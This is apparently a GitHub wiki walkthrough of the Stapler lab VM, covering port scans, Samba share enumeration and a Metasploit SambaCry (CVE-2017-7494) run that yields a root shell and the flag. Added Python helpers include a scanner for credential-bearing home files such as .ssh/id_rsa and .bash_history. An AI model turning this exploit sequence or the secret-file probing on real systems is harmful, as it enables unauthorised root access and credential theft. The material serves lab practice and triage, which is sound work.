stapler - danielcastropalomares/security GitHub Wiki
A first scan, covering the full TCP port range (the 12 ports listed plus the 65523 reported as filtered add up to all 65535), shows the following open ports:
Nmap scan report for 172.31.255.113
Host is up (0.0013s latency).
Not shown: 65523 filtered ports
PORT STATE SERVICE
20/tcp closed ftp-data
21/tcp open ftp
22/tcp open ssh
53/tcp open domain
80/tcp open http
123/tcp closed ntp
137/tcp closed netbios-ns
138/tcp closed netbios-dgm
139/tcp open netbios-ssn
666/tcp closed doom
3306/tcp open mysql
12380/tcp open unknown
MAC Address: 08:00:27:87:25:4C (Oracle VirtualBox virtual NIC)
root@kali:~# nmap -A 172.31.255.113
Starting Nmap 7.70 ( https://nmap.org ) at 2018-12-27 16:47 CET
Nmap scan report for 172.31.255.113
Host is up (0.00059s latency).
Not shown: 992 filtered ports
PORT STATE SERVICE VERSION
20/tcp closed ftp-data
21/tcp open ftp vsftpd 2.0.8 or later
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: PASV failed: 550 Permission denied.
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 172.31.255.129
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 4
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 81:21:ce:a1:1a:05:b1:69:4f:4d:ed:80:28:e8:99:05 (RSA)
| 256 5b:a5:bb:67:91:1a:51:c2:d3:21:da:c0:ca:f0:db:9e (ECDSA)
|_ 256 6d:01:b7:73:ac:b0:93:6f:fa:b9:89:e6:ae:3c:ab:d3 (ED25519)
53/tcp open domain dnsmasq 2.75
| dns-nsid:
|_ bind.version: dnsmasq-2.75
80/tcp open http PHP cli server 5.5 or later
|_http-title: 404 Not Found
139/tcp open netbios-ssn Samba smbd 4.3.9-Ubuntu (workgroup: WORKGROUP)
666/tcp open doom?
| fingerprint-strings:
| NULL:
| message2.jpgUT
| QWux
| "DL[E
| #;3[
| \xf6
| u([r
| qYQq
| Y_?n2
| 3&M~{
| 9-a)T
| L}AJ
|_ .npy.9
3306/tcp open mysql MySQL 5.7.12-0ubuntu1
| mysql-info:
| Protocol: 10
| Version: 5.7.12-0ubuntu1
| Thread ID: 7
| Capabilities flags: 63487
| Some Capabilities: IgnoreSpaceBeforeParenthesis, Support41Auth, SupportsTransactions, SupportsCompression, DontAllowDatabaseTableColumn, InteractiveClient, LongColumnFlag, Speaks41ProtocolNew, IgnoreSigpipes, LongPassword, SupportsLoadDataLocal, ConnectWithDatabase, ODBCClient, FoundRows, Speaks41ProtocolOld, SupportsMultipleStatments, SupportsAuthPlugins, SupportsMultipleResults
| Status: Autocommit
| Salt: \x7F\x7F\x14l}ds~nzx'\x0BZ\x13t[\x18%>
|_ Auth Plugin Name: 88
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port666-TCP:V=7.70%I=7%D=12/27%Time=5C24F408%P=x86_64-pc-linux-gnu%r(NU
SF:LL,2D58,"PK\x03\x04\x14\0\x02\0\x08\0d\x80\xc3Hp\xdf\x15\x81\xaa,\0\0\x
SF:152\0\0\x0c\0\x1c\0message2\.jpgUT\t\0\x03\+\x9cQWJ\x9cQWux\x0b\0\x01\x
SF:04\xf5\x01\0\0\x04\x14\0\0\0\xadz\x0bT\x13\xe7\xbe\xefP\x94\x88\x88A@\x
SF:a2\x20\x19\xabUT\xc4T\x11\xa9\x102>\x8a\xd4RDK\x15\x85Jj\xa9\"DL\[E\xa2
SF:\x0c\x19\x140<\xc4\xb4\xb5\xca\xaen\x89\x8a\x8aV\x11\x91W\xc5H\x20\x0f\
SF:xb2\xf7\xb6\x88\n\x82@%\x99d\xb7\xc8#;3\[\r_\xcddr\x87\xbd\xcf9\xf7\xae
SF:u\xeeY\xeb\xdc\xb3oX\xacY\xf92\xf3e\xfe\xdf\xff\xff\xff=2\x9f\xf3\x99\x
SF:d3\x08y}\xb8a\xe3\x06\xc8\xc5\x05\x82>`\xfe\x20\xa7\x05:\xb4y\xaf\xf8\x
SF:a0\xf8\xc0\^\xf1\x97sC\x97\xbd\x0b\xbd\xb7nc\xdc\xa4I\xd0\xc4\+j\xce\[\
SF:x87\xa0\xe5\x1b\xf7\xcc=,\xce\x9a\xbb\xeb\xeb\xdds\xbf\xde\xbd\xeb\x8b\
SF:xf4\xfdis\x0f\xeeM\?\xb0\xf4\x1f\xa3\xcceY\xfb\xbe\x98\x9b\xb6\xfb\xe0\
SF:xdc\]sS\xc5bQ\xfa\xee\xb7\xe7\xbc\x05AoA\x93\xfe9\xd3\x82\x7f\xcc\xe4\x
SF:d5\x1dx\xa2O\x0e\xdd\x994\x9c\xe7\xfe\x871\xb0N\xea\x1c\x80\xd63w\xf1\x
SF:af\xbd&&q\xf9\x97'i\x85fL\x81\xe2\\\xf6\xb9\xba\xcc\x80\xde\x9a\xe1\xe2
SF::\xc3\xc5\xa9\x85`\x08r\x99\xfc\xcf\x13\xa0\x7f{\xb9\xbc\xe5:i\xb2\x1bk
SF:\x8a\xfbT\x0f\xe6\x84\x06/\xe8-\x17W\xd7\xb7&\xb9N\x9e<\xb1\\\.\xb9\xcc
SF:\xe7\xd0\xa4\x19\x93\xbd\xdf\^\xbe\xd6\xcdg\xcb\.\xd6\xbc\xaf\|W\x1c\xf
SF:d\xf6\xe2\x94\xf9\xebj\xdbf~\xfc\x98x'\xf4\xf3\xaf\x8f\xb9O\xf5\xe3\xcc
SF:\x9a\xed\xbf`a\xd0\xa2\xc5KV\x86\xad\n\x7fou\xc4\xfa\xf7\xa37\xc4\|\xb0
SF:\xf1\xc3\x84O\xb6nK\xdc\xbe#\)\xf5\x8b\xdd{\xd2\xf6\xa6g\x1c8\x98u\(\[r
SF:\xf8H~A\xe1qYQq\xc9w\xa7\xbe\?}\xa6\xfc\x0f\?\x9c\xbdTy\xf9\xca\xd5\xaa
SF:k\xd7\x7f\xbcSW\xdf\xd0\xd8\xf4\xd3\xddf\xb5F\xabk\xd7\xff\xe9\xcf\x7fy
SF:\xd2\xd5\xfd\xb4\xa7\xf7Y_\?n2\xff\xf5\xd7\xdf\x86\^\x0c\x8f\x90\x7f\x7
SF:f\xf9\xea\xb5m\x1c\xfc\xfef\"\.\x17\xc8\xf5\?B\xff\xbf\xc6\xc5,\x82\xcb
SF:\[\x93&\xb9NbM\xc4\xe5\xf2V\xf6\xc4\t3&M~{\xb9\x9b\xf7\xda-\xac\]_\xf9\
SF:xcc\[qt\x8a\xef\xbao/\xd6\xb6\xb9\xcf\x0f\xfd\x98\x98\xf9\xf9\xd7\x8f\x
SF:a7\xfa\xbd\xb3\x12_@N\x84\xf6\x8f\xc8\xfe{\x81\x1d\xfb\x1fE\xf6\x1f\x81
SF:\xfd\xef\xb8\xfa\xa1i\xae\.L\xf2\\g@\x08D\xbb\xbfp\xb5\xd4\xf4Ym\x0bI\x
SF:96\x1e\xcb\x879-a\)T\x02\xc8\$\x14k\x08\xae\xfcZ\x90\xe6E\xcb<C\xcap\x8
SF:f\xd0\x8f\x9fu\x01\x8dvT\xf0'\x9b\xe4ST%\x9f5\x95\xab\rSWb\xecN\xfb&\xf
SF:4\xed\xe3v\x13O\xb73A#\xf0,\xd5\xc2\^\xe8\xfc\xc0\xa7\xaf\xab4\xcfC\xcd
SF:\x88\x8e}\xac\x15\xf6~\xc4R\x8e`wT\x96\xa8KT\x1cam\xdb\x99f\xfb\n\xbc\x
SF:bcL}AJ\xe5H\x912\x88\(O\0k\xc9\xa9\x1a\x93\xb8\x84\x8fdN\xbf\x17\xf5\xf
SF:0\.npy\.9\x04\xcf\x14\x1d\x89Rr9\xe4\xd2\xae\x91#\xfbOg\xed\xf6\x15\x04
SF:\xf6~\xf1\]V\xdcBGu\xeb\xaa=\x8e\xef\xa4HU\x1e\x8f\x9f\x9bI\xf4\xb6GTQ\
SF:xf3\xe9\xe5\x8e\x0b\x14L\xb2\xda\x92\x12\xf3\x95\xa2\x1c\xb3\x13\*P\x11
SF:\?\xfb\xf3\xda\xcaDfv\x89`\xa9\xe4k\xc4S\x0e\xd6P0");
MAC Address: 08:00:27:87:25:4C (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Host: RED; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 59m59s, deviation: 0s, median: 59m58s
|_nbstat: NetBIOS name: RED, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.9-Ubuntu)
| Computer name: red
| NetBIOS computer name: RED\x00
| Domain name: \x00
| FQDN: red
|_ System time: 2018-12-27T16:47:33+00:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2018-12-27 17:47:33
|_ start_date: N/A
TRACEROUTE
HOP RTT ADDRESS
1 0.59 ms 172.31.255.113
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 47.78 seconds
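The fingerprint nmap prints for 666/tcp is simply the first bytes the service sent on connection, escaped so they are printable; decoding them identifies the service without any further probing. The following Python script is an added example (not part of the original writeup) that undoes nmap's escaping and then reads the ZIP local file header that the bytes turn out to be. The sample input is the first four fingerprint lines copied from the scan output above; the header layout follows the PKZIP specification, and the identify_banner helper is an assumption of this example, not an nmap feature.

```python
import re
import struct

# Sample input: the first four lines of the port-666 service fingerprint that nmap
# printed in the scan above (enough to cover a whole ZIP local file header).
SAMPLE_FINGERPRINT_LINES = [
    r'SF-Port666-TCP:V=7.70%I=7%D=12/27%Time=5C24F408%P=x86_64-pc-linux-gnu%r(NU',
    r'SF:LL,2D58,"PK\x03\x04\x14\0\x02\0\x08\0d\x80\xc3Hp\xdf\x15\x81\xaa,\0\0\x',
    r'SF:152\0\0\x0c\0\x1c\0message2\.jpgUT\t\0\x03\+\x9cQWJ\x9cQWux\x0b\0\x01\x',
    r'SF:04\xf5\x01\0\0\x04\x14\0\0\0\xadz\x0bT\x13\xe7\xbe\xefP\x94\x88\x88A@\x',
]

# Single-character escapes nmap uses besides \xHH and backslash + punctuation.
_SIMPLE_ESCAPES = {"0": 0x00, "n": 0x0A, "r": 0x0D, "t": 0x09}


def decode_nmap_escapes(text):
    """Turn nmap's printable escaping back into raw bytes.

    A dangling escape at the end of truncated input is dropped rather than raising,
    so a partial fingerprint (as in the sample) still decodes as far as it goes.
    """
    out = bytearray()
    i, n = 0, len(text)
    while i < n:
        c = text[i]
        if c != "\\":
            out.append(ord(c) & 0xFF)
            i += 1
            continue
        if i + 1 >= n:
            break
        e = text[i + 1]
        if e == "x":
            if i + 4 > n:          # needs two hex digits
                break
            out.append(int(text[i + 2:i + 4], 16))
            i += 4
        elif e in _SIMPLE_ESCAPES:
            out.append(_SIMPLE_ESCAPES[e])
            i += 2
        else:                      # \. \[ \" \\ ...: the literal character
            out.append(ord(e) & 0xFF)
            i += 2
    return bytes(out)


def parse_fingerprint(lines):
    """Join the SF-...: / SF: continuation lines and extract the first probe response."""
    joined = lines[0] + "".join(l[len("SF:"):] for l in lines[1:])
    m = re.search(r'%r\((\w+),([0-9A-Fa-f]+),"', joined)
    if not m:
        raise ValueError("no probe response in fingerprint")
    # Find the closing quote, honouring backslash escapes; truncated input has none.
    start = j = m.end()
    while j < len(joined) and joined[j] != '"':
        j += 2 if joined[j] == "\\" else 1
    return {
        "probe": m.group(1),
        "length": int(m.group(2), 16),       # total bytes the service sent
        "data": decode_nmap_escapes(joined[start:j]),
    }


_ZIP_LOCAL = struct.Struct("<4sHHHHHIIIHH")   # PKZIP local file header, little-endian


def parse_zip_local_header(data):
    """Return the fields of a ZIP local file header, or None if data is not one."""
    if len(data) < _ZIP_LOCAL.size or data[:4] != b"PK\x03\x04":
        return None
    (_, version, flags, method, mtime, mdate,
     crc, csize, usize, nlen, xlen) = _ZIP_LOCAL.unpack_from(data)
    name = data[_ZIP_LOCAL.size:_ZIP_LOCAL.size + nlen]
    return {"name": name, "method": method, "crc32": crc,
            "compressed_size": csize, "uncompressed_size": usize,
            "flags": flags, "extra_len": xlen}


def identify_banner(data):
    """Name what the service sent, for the few formats this example knows."""
    hdr = parse_zip_local_header(data)
    if hdr:
        return "ZIP archive, first entry %s (%d bytes, method %d)" % (
            hdr["name"].decode("latin-1"), hdr["uncompressed_size"], hdr["method"])
    if data.startswith(b"\x7fELF"):
        return "ELF binary"
    return "unknown"


if __name__ == "__main__":
    fp = parse_fingerprint(SAMPLE_FINGERPRINT_LINES)
    print(fp["probe"], fp["length"], identify_banner(fp["data"]))
```

Run stand-alone it reports the NULL probe, the 11608 bytes the service pushed, and the archive's first entry; the same decoder works on any SF block nmap prints, which is often quicker than submitting the fingerprint and waiting.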
Note that the nmap -A run above used nmap's default port list, so it never fingerprinted 12380/tcp, which the full-range scan reported open; a follow-up nmap -A -p 12380 172.31.255.113 is needed to identify that service. Also, the unrecognised service on 666/tcp (reported closed in the first scan, open in the second) sends data on connection that begins with PK\x03\x04 followed by the name message2.jpg: that is the local file header of a ZIP archive, so the port is serving a ZIP file rather than anything Doom-related.

The DNS service looks like it is configured as a forwarder (it resolves external names on our behalf):
root@kali:~# host google.es 172.31.255.113
Using domain server:
Name: 172.31.255.113
Address: 172.31.255.113#53
Aliases:
google.es has address 172.217.16.227
google.es has IPv6 address 2a00:1450:4003:803::2003
google.es mail is handled by 10 aspmx.l.google.com.
google.es mail is handled by 30 alt2.aspmx.l.google.com.
google.es mail is handled by 40 alt3.aspmx.l.google.com.
google.es mail is handled by 20 alt1.aspmx.l.google.com.
google.es mail is handled by 50 alt4.aspmx.l.google.com.
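To confirm the forwarder finding programmatically, here is an added Python example (not part of the original writeup) that builds a recursive DNS query by hand, parses the answer, and checks both the Recursion Available flag and that an A record came back. The response bytes used for the offline check are constructed, reusing the google.es address the host command received above; the hop limit on compression pointers is there because a hostile resolver could otherwise loop the parser.

```python
import secrets
import socket
import struct

MAX_POINTER_HOPS = 16   # stops a malicious response from looping compression pointers


def build_query(name, qtype=1, txid=None):
    """Build a standard recursive (RD=1) query for name, class IN, type A by default."""
    if txid is None:
        txid = secrets.randbelow(1 << 16)
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)   # flags: RD set
    qname = b"".join(bytes([len(label)]) + label.encode("ascii")
                     for label in name.rstrip(".").split(".")) + b"\x00"
    return header + qname + struct.pack("!HH", qtype, 1)


def read_name(pkt, off):
    """Decode a possibly compressed name; return (name, offset just past it)."""
    labels, end, hops = [], None, 0
    while True:
        ln = pkt[off]
        if ln & 0xC0 == 0xC0:                       # compression pointer
            hops += 1
            if hops > MAX_POINTER_HOPS:
                raise ValueError("compression pointer loop")
            if end is None:
                end = off + 2                       # resume after the pointer
            off = struct.unpack_from("!H", pkt, off)[0] & 0x3FFF
            continue
        off += 1
        if ln == 0:
            break
        labels.append(pkt[off:off + ln].decode("ascii"))
        off += ln
    return ".".join(labels), (end if end is not None else off)


def parse_response(pkt, expected_txid):
    """Parse header flags and A answers; reject a mismatched txid (spoofed reply)."""
    txid, flags, qd, an, ns, ar = struct.unpack_from("!HHHHHH", pkt, 0)
    if txid != expected_txid:
        raise ValueError("transaction id mismatch")
    off = 12
    for _ in range(qd):                             # skip the question section
        _, off = read_name(pkt, off)
        off += 4                                    # qtype + qclass
    a_records = []
    for _ in range(an):
        _, off = read_name(pkt, off)
        rtype, rclass, ttl, rdlen = struct.unpack_from("!HHIH", pkt, off)
        off += 10
        if rtype == 1 and rclass == 1 and rdlen == 4:
            a_records.append(".".join(str(b) for b in pkt[off:off + 4]))
        off += rdlen
    return {
        "qr": bool(flags & 0x8000),
        "ra": bool(flags & 0x0080),   # Recursion Available: server resolves for us
        "rcode": flags & 0x000F,
        "answers": an,
        "a_records": a_records,
    }


def is_open_resolver(server, name="google.es", port=53, timeout=3.0):
    """Send one recursive query over UDP and report whether the server answered it for us."""
    q = build_query(name)
    txid = struct.unpack_from("!H", q)[0]
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(q, (server, port))
        data, _ = s.recvfrom(4096)
    r = parse_response(data, txid)
    return r["qr"] and r["ra"] and r["rcode"] == 0 and bool(r["a_records"])


# Constructed sample: what an open forwarder returns for the query above, using the
# A record the host command in the writeup received (not a captured packet).
SAMPLE_RESPONSE = (
    struct.pack("!HHHHHH", 0x1234, 0x8180, 1, 1, 0, 0)      # QR, RD, RA set; rcode 0
    + b"\x06google\x02es\x00" + struct.pack("!HH", 1, 1)    # question: google.es A IN
    + b"\xc0\x0c" + struct.pack("!HHIH", 1, 1, 300, 4)      # answer name -> offset 12
    + bytes([172, 217, 16, 227])
)

# Constructed sample: a reply with RA clear and no answers (recursion refused).
SAMPLE_NO_RECURSION = (
    struct.pack("!HHHHHH", 0x0001, 0x8100, 1, 0, 0, 0)
    + b"\x06google\x02es\x00" + struct.pack("!HH", 1, 1)
)
```

In the field, is_open_resolver("172.31.255.113") reproduces the host check; the txid comparison and pointer hop limit are the two details that keep a quick probe from being fooled or hung by a misbehaving server.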
We launch a wordlist-based directory brute force against the web server on port 80:
[*] Execute: /usr/local/src/Osmedeus/plugins/dirsearch/dirsearch.py --plain-text-report=/usr/local/src/Osmedeus/workspaces/172.31.255.113/directory/172.31.255.113-dirsearch.txt -u "http://172.31.255.113" -e php,asp,aspx,jsp,js -t 20
Extensions: php, asp, aspx, jsp, js | Threads: 20 | Wordlist size: 7489
Error Log: /usr/local/src/Osmedeus/plugins/dirsearch/logs/errors-18-12-27_17-12-08.log
Target: http://172.31.255.113
[17:12:08] Starting:
[17:12:08] 200 - 220B - /.bash_logout
[17:12:08] 200 - 4KB - /.bashrc
[17:12:08] 200 - 4KB - /.bashrc/
[17:12:09] 200 - 675B - /.profile
The hits /.bash_logout, /.bashrc and /.profile are shell dotfiles, which suggests that the PHP built-in server on port 80 has a user's home directory as its document root. I try to fetch an SSH key pair from it, without success:
root@kali:/tmp/stapler# wget http://172.31.255.113/.ssh/id_rsa
--2018-12-27 17:16:31-- http://172.31.255.113/.ssh/id_rsa
Connecting to 172.31.255.113:80... connected.
HTTP request sent, awaiting response... 404 Not Found
2018-12-27 17:16:31 ERROR 404: Not Found.
root@kali:/tmp/stapler# wget http://172.31.255.113/.ssh/id_rsa.pub
--2018-12-27 17:16:39-- http://172.31.255.113/.ssh/id_rsa.pub
Connecting to 172.31.255.113:80... connected.
HTTP request sent, awaiting response... 404 Not Found
2018-12-27 17:16:39 ERROR 404: Not Found.
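Generalising the two wget attempts, this added Python example (not from the original writeup) probes a list of home-directory files that typically leak credentials or history when a web root lands inside a home directory. The path list and the fake target it runs against offline are constructed for the example; the stand-in answers 200 for unknown paths on purpose, to show why the script first learns what "not found" looks like before trusting a 200.

```python
import secrets
import urllib.error
import urllib.request

# Hypothetical checklist: files under a home directory that give away credentials or
# history, plus the dotfiles whose presence confirms the web root is a home directory.
HOME_SECRETS = [
    ".bashrc", ".profile", ".bash_logout",
    ".bash_history", ".mysql_history", ".netrc", ".my.cnf", ".git-credentials",
    ".ssh/id_rsa", ".ssh/id_ed25519", ".ssh/authorized_keys", ".ssh/known_hosts",
]


def urllib_fetch(url, timeout=5.0):
    """Default fetcher: return (status, body); an HTTP error is still a response."""
    req = urllib.request.Request(url, headers={"User-Agent": "dotfile-probe"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read()
    except urllib.error.HTTPError as e:
        return e.code, e.read()


def probe_home_dotfiles(base_url, fetch=urllib_fetch, paths=HOME_SECRETS):
    """Request each path and keep the ones that differ from the server's not-found reply.

    A random path is fetched first to learn what "not found" looks like, so a server
    that answers 200 for everything (soft 404) does not produce a page of false hits.
    Only status and body length are compared, which is enough for a first pass.
    """
    base = base_url.rstrip("/")
    nf_status, nf_body = fetch("%s/%s" % (base, secrets.token_hex(8)))
    found = {}
    for p in paths:
        status, body = fetch("%s/%s" % (base, p))
        if status == nf_status and len(body) == len(nf_body):
            continue                          # same as baseline: not found
        if status >= 400 and status != 403:   # 403 means it exists but is blocked
            continue
        found[p] = (status, len(body))
    return found


# Constructed stand-in target (not the real box): soft-404 for unknown paths, plus the
# three dotfiles dirsearch reported and one extra hit to make the probe interesting.
_FAKE_SITE = {
    "/.bashrc": (200, b"x" * 3771),
    "/.profile": (200, b"y" * 675),
    "/.bash_logout": (200, b"z" * 220),
    "/.bash_history": (200, b"ls -la\ncat /etc/passwd\n"),
}


def fake_fetch(url):
    """Offline fetcher that answers from _FAKE_SITE with a soft 404 for everything else."""
    path = url[url.index("/", len("http://")):]
    return _FAKE_SITE.get(path, (200, b"<html>nothing here</html>"))


if __name__ == "__main__":
    for path, (status, size) in probe_home_dotfiles("http://example.invalid", fetch=fake_fetch).items():
        print(status, size, path)
```

Against the real target the same call with the default fetcher (probe_home_dotfiles("http://172.31.255.113")) repeats the check; the two id_rsa requests above are just two entries of this list.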
On the Samba side there are several shares; the tmp share is writable (the upload in the exploit run below confirms it):
root@kali:/tmp/stapler# smbclient -L 172.31.255.113
Enter WORKGROUP\root's password:
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
kathy Disk Fred, What are we doing here?
tmp Disk All temporary files should be stored here
IPC$ IPC IPC Service (red server (Samba, Ubuntu))
Inside the kathy share, under the backup directory, we find the following:
smb://172.31.255.113/kathy/backup
vsftpd.conf -> logins are restricted by a user list, and the anonymous user is enabled but without write access.
wordpress-4.tar.gz -> there does not seem to be any interesting configuration in it.
todo-list: I'm making sure to backup anything important for Initech, Kathy
Since the remote Samba server accepts anonymous (guest) access and the tmp share is writable, we try the SambaCry exploit.

CVE-2017-7494 (SambaCry) is a remote code execution bug in every Samba release from 3.5.0 onwards; the upstream fixes were 4.6.4, 4.5.10 and 4.4.14. Exploiting it needs exactly what this target offers: a share we can write to, so we can upload a shared object, plus knowledge of that share's server-side path, because the payload is triggered by opening a named pipe whose name is that full path, which smbd then loads with dlopen() inside its own (root) process. The Metasploit module retrieves the share's server path on its own, and RPORT is set to 139 because the port scan shows only 139/tcp open, not 445.

The victim's version is the following. 4.3.9 is on the 4.3 branch, which did not receive an upstream fix, so it is inside the affected range; keep in mind, though, that distributions backport security fixes without changing the upstream version string, so the banner alone is not proof and the exploit attempt is the real test:
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.9-Ubuntu)
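Before firing the exploit it is worth checking two things: whether the banner version falls in the affected range, and, whenever a copy of the configuration is readable, whether the advisory's workaround (nt pipe support = no in the [global] section) is set. The Python below is an added example, not part of the original writeup or of any Samba tooling; the fix versions come from the Samba security advisory for CVE-2017-7494 and the two smb.conf fragments are constructed.

```python
import re

# CVE-2017-7494 (SambaCry): every Samba release from 3.5.0 onward is affected; the
# upstream fixes were 4.6.4, 4.5.10 and 4.4.14 (Samba security advisory).
FIRST_AFFECTED = (3, 5, 0)
FIXED_IN = {(4, 6): (4, 6, 4), (4, 5): (4, 5, 10), (4, 4): (4, 4, 14)}
NEWEST_FIXED_BRANCH = (4, 6)

_VERSION_RE = re.compile(r"(\d+)\.(\d+)\.(\d+)")


def parse_samba_version(banner):
    """Pull the x.y.z triple out of a banner such as 'Samba smbd 4.3.9-Ubuntu'."""
    m = _VERSION_RE.search(banner)
    if not m:
        raise ValueError("no version in banner: %r" % banner)
    return tuple(int(x) for x in m.groups())


def sambacry_status(banner):
    """Classify an upstream version string as 'not_affected', 'vulnerable' or 'fixed'.

    Distribution packages (the '-Ubuntu' suffix here) often backport the fix without
    bumping the upstream version, so 'vulnerable' means 'worth testing', not 'proven'.
    """
    v = parse_samba_version(banner)
    if v < FIRST_AFFECTED:
        return "not_affected"
    branch = v[:2]
    if branch in FIXED_IN:
        return "fixed" if v >= FIXED_IN[branch] else "vulnerable"
    if branch > NEWEST_FIXED_BRANCH:
        return "fixed"            # released after the advisory
    return "vulnerable"           # 3.5 .. 4.3: branches that never got an upstream fix


def nt_pipe_support_disabled(smb_conf_text):
    """True if [global] carries the advisory's workaround 'nt pipe support = no'."""
    section, value = None, None
    for raw in smb_conf_text.splitlines():
        line = raw.split("#", 1)[0].split(";", 1)[0].strip()   # drop smb.conf comments
        if not line:
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
            continue
        if section == "global" and "=" in line:
            key, val = (s.strip().lower() for s in line.split("=", 1))
            if key == "nt pipe support":
                value = val       # last occurrence wins, as in Samba itself
    return value in ("no", "false", "0")


# Constructed smb.conf fragments for the check above (not the target's real config).
VULNERABLE_CONF = """
[global]
   workgroup = WORKGROUP
   server string = %h server (Samba, Ubuntu)

[tmp]
   path = /var/tmp
   writable = yes
   guest ok = yes
"""

MITIGATED_CONF = VULNERABLE_CONF.replace("[global]", "[global]\n   nt pipe support = no")


if __name__ == "__main__":
    print(sambacry_status("Samba smbd 4.3.9-Ubuntu"))
    print(nt_pipe_support_disabled(VULNERABLE_CONF), nt_pipe_support_disabled(MITIGATED_CONF))
```

The version check is the triage step; the workaround check matters on the defensive side, since disabling NT pipe support blocks the dlopen() trigger even on an unpatched build (at the cost of breaking some Windows clients, which is why the advisory recommends patching instead).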
msf > use exploit/linux/samba/is_known_pipename
msf exploit(linux/samba/is_known_pipename) > set RHOST 172.31.255.113
msf exploit(linux/samba/is_known_pipename) > set RPORT 139
msf exploit(linux/samba/is_known_pipename) > exploit
[*] 172.31.255.113:139 - Using location \\172.31.255.113\tmp\ for the path
[*] 172.31.255.113:139 - Retrieving the remote path of the share 'tmp'
[*] 172.31.255.113:139 - Share 'tmp' has server-side path '/var/tmp
[*] 172.31.255.113:139 - Uploaded payload to \\172.31.255.113\tmp\LaUspOSy.so
[*] 172.31.255.113:139 - Loading the payload from server-side path /var/tmp/LaUspOSy.so using \\PIPE\/var/tmp/LaUspOSy.so...
[-] 172.31.255.113:139 - >> Failed to load STATUS_OBJECT_NAME_NOT_FOUND
[*] 172.31.255.113:139 - Loading the payload from server-side path /var/tmp/LaUspOSy.so using /var/tmp/LaUspOSy.so...
[-] 172.31.255.113:139 - >> Failed to load STATUS_OBJECT_NAME_NOT_FOUND
[*] 172.31.255.113:139 - Uploaded payload to \\172.31.255.113\tmp\nEmUkSQQ.so
[*] 172.31.255.113:139 - Loading the payload from server-side path /var/tmp/nEmUkSQQ.so using \\PIPE\/var/tmp/nEmUkSQQ.so...
[-] 172.31.255.113:139 - >> Failed to load STATUS_OBJECT_NAME_NOT_FOUND
[*] 172.31.255.113:139 - Loading the payload from server-side path /var/tmp/nEmUkSQQ.so using /var/tmp/nEmUkSQQ.so...
[+] 172.31.255.113:139 - Probe response indicates the interactive payload was loaded...
[*] Found shell.
[*] Command shell session 1 opened (172.31.255.129:36701 -> 172.31.255.113:139) at 2018-12-28 13:16:14 +0100
shell
[*] Trying to find binary(python) on target machine
[*] Found python at /usr/bin/python
[*] Using `python` to pop up an interactive shell
python -c 'import pty;pty.spawn("/bin/bash")'
python -c 'import pty;pty.spawn("/bin/bash")'
root@red:/tmp#
The uploaded shared object was loaded by smbd, which runs as root, so the session is root from the start and no privilege escalation is needed. We can read the flag directly:
root@red:/root# cat flag.txt
cat flag.txt
~~~~~~~~~~<(Congratulations)>~~~~~~~~~~
.-'''''-.
|'-----'|
|-.....-|
| |
| |
_,._ | |
__.o` o`"-. | |
.-O o `"-.o O )_,._ | |
( o O o )--.-"`O o"-.`'-----'`
'--------' ( o O o)
`----------`
b6b545dc11b7a270f4bad23432190c75162c4a2b